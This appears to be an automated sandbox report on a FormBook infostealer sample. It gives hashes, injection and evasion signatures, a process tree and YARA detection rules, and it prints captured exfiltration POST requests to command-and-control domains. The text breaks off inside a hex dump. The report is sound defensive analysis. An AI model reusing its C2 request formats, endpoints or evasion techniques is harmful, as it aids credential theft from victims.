
Analysis Report Mqbmupv_Signed_.exe

Overview

General Information

Sample Name:Mqbmupv_Signed_.exe
Analysis ID:288093
MD5:20a3b044b6d1b39051e35269e6590c0b
SHA1:bc6bc3a617091a5f13dcfe134b3a55d19e8f77e6
SHA256:2ead77594bc7d6fb376764fad896f830955a1ac70155c0f9feb42299f5c788a9
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Mqbmupv_Signed_.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
    • notepad.exe (PID: 344 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ieinstal.exe (PID: 6544 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Mqbmnet.exe (PID: 6912 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
          • ieinstal.exe (PID: 2212 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • Mqbmnet.exe (PID: 5976 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
          • ieinstal.exe (PID: 5204 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • autochk.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • ipconfig.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
        • control.exe (PID: 4864 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Mqbm.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x87:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.url | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x5c:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x1258:$file: URL=
  • 0x123c:$url_explicit: [InternetShortcut]
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x1284:$icon: IconFile=
  • 0x123c:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x620:$file: URL=
  • 0x604:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x64c:$icon: IconFile=
  • 0x604:$url_explicit: [InternetShortcut]
0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
29.2.ieinstal.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
29.2.ieinstal.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
29.2.ieinstal.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17539:$sqlite3step: 68 34 1C 7B E1
  • 0x1764c:$sqlite3step: 68 34 1C 7B E1
  • 0x17568:$sqlite3text: 68 38 2A 90 C5
  • 0x1768d:$sqlite3text: 68 38 2A 90 C5
  • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
9.2.ieinstal.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.ieinstal.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Mqbmnet.exe | Virustotal: Detection: 27%
Source: C:\Users\user\AppData\Local\Mqbmnet.exe | ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: Mqbmupv_Signed_.exe | Virustotal: Detection: 27%
Source: Mqbmupv_Signed_.exe | ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match | File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 29.2.ieinstal.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.ieinstal.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 2_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 2_2_5048518C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4x nop then pop esi | 9_2_00417274
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4x nop then pop edi | 9_2_00416BCD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4x nop then pop edi | 9_2_00417CA7

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49754
Source: global traffic | HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1 | Host: www.thelocaladda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1 | Host: www.kingofinvest.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | IP Address: 162.159.129.233
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 49 79 77 4e 7a 38 41 62 75 71 78 6b 6a 4f 6b 30 52 7a 53 30 4e 65 42 46 64 67 4a 53 59 37 66 68 37 71 63 6e 32 50 62 5a 6c 65 38 49 37 31 32 78 65 48 72 55 76 4e 65 67 44 55 47 35 50 50 63 65 6d 68 47 50 63 71 54 46 37 54 65 49 45 6e 31 42 51 47 66 37 31 45 66 68 65 6e 58 75 6b 31 78 33 58 6e 67 62 53 58 62 67 79 50 75 73 52 57 78 31 4a 48 6e 4d 49 51 59 53 66 4d 5a 4e 4e 70 52 6b 75 6e 4b 6b 43 67 71 4e 31 35 36 65 57 41 75 7e 51 4d 34 59 49 65 61 76 59 31 38 6a 6f 70 4b 61 7a 61 74 57 54 71 4c 50 41 75 76 78 34 48 69 65 4c 46 4d 53 44 79 49 69 64 4f 47 31 65 79 6b 4d 55 4c 33 6d 4e 6b 70 45 31 51 71 43 36 45 59 51 4f 55 7a 54 6e 28 54 6a 5f 6f 6f 5a 45 58 30 51 39 45 56 28 52 66 76 70 77 33 61 4e 2d 36 76 77 52 72 56 51 66 75 72 4f 74 52 50 6f 66 73 6c 68 5a 67 6a 6f 5a 31 44 53 36 47 44 6f 35 39 35 37 78 76 51 32 66 42 77 32 41 47 49 37 45 70 43 54 45 32 69 7a 33 79 34 64 35 6f 55 31 2d 64 36 34 34 75 42 6a 46 67 66 67 75 79 50 36 37 6e 69 7e 56 55 68 41 47 65 39 56 42 54 72 59 41 7a 50 38 6a 74 6f 30 57 68 53 47 77 51 61 57 79 4d 72 4d 72 47 65 6a 55 51 5f 34 52 78 45 33 4c 63 54 52 51 62 64 6f 6d 6d 39 6a 47 79 6d 39 68 28 50 52 69 79 48 61 54 68 31 79 7a 61 77 33 2d 6c 42 44 56 7a 54 63 50 77 58 36 56 4d 70 70 55 75 61 65 6d 79 5f 59 73 77 74 76 64 65 4c 58 67 55 72 38 34 45 59 6a 53 41 56 37 4b 4c 68 6a 6d 55 6f 61 6b 6e 33 67 6f 6a 52 67 6d 77 6d 6b 2d 72 69 75 77 31 6f 6a 36 73 68 39 74 58 75 57 33 73 45 65 5a 37 69 32 56 71 63 67 33 7e 4b 47 55 58 57 6a 73 70 73 37 69 78 68 4b 69 74 
33 72 64 56 6f 61 6e 74 49 28 43 31 5f 4b 6a 70 45 50 72 42 54 33 34 39 69 44 44 67 67 62 44 48 32 37 47 78 5a 73 48 66 31 34 65 71 33 52 44 70 69 70 54 30 58 48 51 30 31 6a 2d 6e 4b 56 72 41 54 4e 4f 4e 34 53 54 38 6b 71 64 42 62 72 79 55 42 55 53 67 6d 76 54 54 5a 6d 50 4a 36 36 54 69 31 39 37 54 41 52 50 38 42 35 75 63 68 59 6e 59 55 41 43 49 4b 45 62 32 68 43 71 7a 57 51 76 61 50 43 57 74 75 49 73 71 77 6c 77 43 41 33 70 75 48 4a 35 35 30 44 4f 50 70 32 4c 71 47 64 4a 74 73 38 57 38 5a 4c 30 46 6e 7a 70 61 76 4f 78 43 4e 54 4e 43 37 28 63 4f 61 42 39 48 68 41 4a 39 57 57 58 43 30 42 56 75 63 64 5f 42 58 6b 39 6c 35 28 78 69 6a 63 52 70 52 63 5f 4d 69 76 47 31 35 4a 4c 7a 41 6b 4c 69 33 31 35 5a 49 39 4f 67 4e 4a 77 6d 66 68 68 4d 65 45 70 72 6a 34 61 4c 6a 7a 33 66 55 67 36 4d 2d 74 73 68 55 58 7a 63 30 66 52 78 58 76 63 30 39 77 7a 38 56 6a 68 6d 6d 52 66 4e 31 52 6d 54 58 66 66 6d 66 74 55 72 61 5a 50 68 77 4c 5f 6d 58 75 48 6c 45 38 55 57 58 66 4c 6c 35 48 70 35 35 6d 71 76 45 28 67 53 53 33 49 62 56 4f 6b 3
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6c 4d 39 56 42 76 5a 4a 67 71 72 7e 67 65 75 68 4d 58 43 63 64 42 7a 54 44 53 64 62 38 42 4f 4b 53 64 63 34 5f 77 37 79 4e 48 71 31 30 78 52 75 70 77 31 58 4b 54 76 33 74 79 64 78 48 4f 5f 65 71 71 74 61 44 4d 6b 36 47 62 74 52 74 36 66 50 32 6f 6c 62 4f 33 50 63 50 4b 35 62 69 43 2d 54 46 66 6b 28 58 75 39 56 7a 6f 6f 61 36 4c 44 4e 74 68 57 37 2d 65 47 35 34 44 55 75 35 41 6a 55 38 6e 41 58 4a 75 69 61 6e 48 68 55 59 37 65 73 65 4a 4e 78 70 69 49 6e 66 56 55 68 2d 5a 45 72 41 68 53 4a 6b 64 66 46 69 50 38 42 6b 6e 58 6a 6b 79 38 37 5a 75 4c 62 44 4c 7a 37 51 6c 62 74 70 36 4a 55 59 43 57 73 54 48 32 62 30 4e 41 59 4e 45 69 38 5f 74 45 43 74 52 4f 49 7a 39 2d 58 2d 75 46 56 4a 44 77 46 57 65 4b 6d 34 4d 76 6a 73 35 49 69 4f 79 74 30 73 66 41 66 63 61 44 70 55 39 32 31 58 74 52 4e 52 73 64 78 4f 68 62 71 33 4c 45 66 78 59 72 30 77 57 34 78 73 6b 5a 44 4f 45 45 56 37 53 73 6b 35 34 4d 65 45 64 45 4b 35 68 37 59 6d 68 62 48 52 6b 42 52 31 69 63 66 33 7e 45 32 71 45 5f 68 78 46 62 6c 45 67 4f 6c 4d 44 34 42 58 63 75 58 52 41 76 79 32 48 56 53 49 45 6e 65 67 35 68 39 59 77 48 34 39 45 33 55 30 47 67 7e 61 76 65 33 34 63 55 4c 4d 50 73 31 36 66 45 77 52 76 54 64 31 6a 6e 31 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
ATxxQxK=RHR1mlM9VBvZJgqr~geuhMXCcdBzTDSdb8BOKSdc4_w7yNHq10xRupw1XKTv3tydxHO_eqqtaDMk6GbtRt6fP2olbO3PcPK5biC-TFfk(Xu9Vzooa6LDNthW7-eG54DUu5AjU8nAXJuianHhUY7eseJNxpiInfVUh-ZErAhSJkdfFiP8BknXjky87ZuLbDLz7Qlbtp6JUYCWsTH2b0NAYNEi8_tECtROIz9-X-uFVJDwFWeKm4Mvjs5IiOyt0sfAfcaDpU921XtRNRsdxOhbq3LEfxYr0wW4xskZDOEEV7Ssk54MeEdEK5h7YmhbHRkBR1icf3~E2qE_hxFblEgOlMD4BXcuXRAvy2HVSIEneg5h9YwH49E3U0Gg~ave34cULMPs16fEwRvTd1jn1A).
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6b 55 44 5a 52 36 66 65 69 7e 75 38 77 4f 51 72 63 6e 63 4c 4e 38 70 44 68 43 6e 46 39 68 6b 4b 54 4d 30 68 75 67 54 31 75 50 71 33 33 5a 63 6a 70 77 36 66 71 54 75 6d 64 32 50 38 33 6e 79 65 72 75 44 61 44 31 79 73 77 33 6f 53 39 36 75 4f 57 74 42 4b 65 7a 59 63 4e 7e 51 62 42 7a 34 55 46 6a 6b 31 48 47 5f 61 79 35 75 64 37 48 51 41 39 39 58 35 36 61 62 35 4f 28 38 76 61 38 64 64 64 37 43 56 4f 53 70 57 48 33 4a 43 62 62 42 69 75 4e 4b 7e 49 32 58 36 73 77 54 73 62 30 78 33 56 56 52 41 30 46 42 4f 41 57 44 45 51 57 68 76 55 43 6f 37 61 50 77 42 68 50 75 28 54 41 58 76 62 66 42 4e 38 36 55 31 79 48 59 4e 48 70 78 61 4e 55 64 68 4b 52 44 55 39 38 61 50 78 30 31 49 50 47 32 59 62 6e 43 4f 45 47 79 6c 72 67 6e 72 4d 70 6e 75 70 48 74 6d 39 7e 4e 63 65 33 51 32 45 39 64 33 58 74 56 5a 78 73 4c 36 49 39 71 70 48 61 69 66 79 34 48 7e 44 43 39 79 71 6b 5a 4e 4c 5a 34 58 4c 43 65 72 74 45 65 54 6e 78 44 49 2d 68 59 64 6d 68 39 48 51 49 38 52 31 69 51 66 32 7e 2d 6b 6f 34 5f 6e 6b 4a 79 78 44 55 34 6a 4d 43 69 43 44 34 73 4d 58 73 5f 79 79 6a 56 41 4e 41 4e 65 54 5a 68 72 5a 41 45 34 5a 51 33 56 6b 47 67 34 61 75 6f 37 34 31 48 50 4f 69 52 6b 35 54 73 31 6e 65 6a 59 55 4b 66 70 62 62 71 37 52 37 35 4e 56 4d 71 77 5a 59 4c 47 2d 4e 67 76 32 69 54 64 75 4b 52 6e 69 7e 5a 4c 43 46 62 66 79 4d 30 50 5f 33 34 67 50 69 6d 45 32 76 35 4e 6b 34 57 71 6a 6a 74 6e 72 42 66 66 39 70 6d 32 48 37 42 4f 6e 31 66 30 54 50 4a 52 4c 6e 41 67 46 64 43 32 69 53 4a 54 4d 6a 31 51 47 54 38 59 44 50 30 61 4b 68 74 28 57 78 
30 6f 76 72 41 69 43 58 47 42 4c 68 70 6e 7a 62 71 4b 56 65 50 36 57 72 2d 28 4e 71 69 5a 79 56 5f 38 5a 56 62 57 43 39 71 4d 69 42 65 79 5a 58 47 62 65 75 70 52 4c 38 61 44 70 59 36 4b 68 65 5a 4a 5f 49 46 42 44 35 30 64 49 63 7a 76 61 76 6e 6e 54 42 62 75 75 54 54 62 2d 39 52 32 79 65 75 61 61 49 75 5a 4d 43 70 28 48 49 57 59 56 4f 58 55 70 79 78 4f 31 4a 51 79 4e 54 7a 53 65 62 74 36 77 66 4f 58 58 42 63 77 39 7a 74 57 6d 69 6b 54 44 37 4f 6b 5f 7e 48 57 4b 34 63 78 5a 44 4d 37 52 59 37 44 35 28 72 35 47 4e 62 67 41 68 78 34 33 45 44 63 32 4e 2d 54 50 5a 49 78 47 44 59 4a 65 54 55 56 52 64 6d 6e 66 73 71 4e 37 39 7a 69 79 67 59 51 49 6e 76 70 30 55 64 41 44 36 62 45 62 59 51 59 67 6e 48 69 73 71 6e 66 38 61 74 42 53 38 51 33 4d 54 53 6e 61 33 32 42 37 68 35 75 6e 71 6b 75 5a 78 58 6a 62 32 33 6f 67 49 67 4c 44 47 56 75 72 52 67 28 46 39 34 41 77 35 52 64 37 52 5a 79 35 71 55 72 33 43 7a 63 7a 63 55 72 31 4c 35 66 49 4d 41 34 41 49 56 4a 4d 6d 70 5a 34 63 64 41 30 4b 63 53 70 6e 61 7e 59 4b 32 6f 47 71 31 72 54 2
Source: global traffic | HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1 | Host: www.thelocaladda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1 | Host: www.kingofinvest.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
        Source: unknownHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 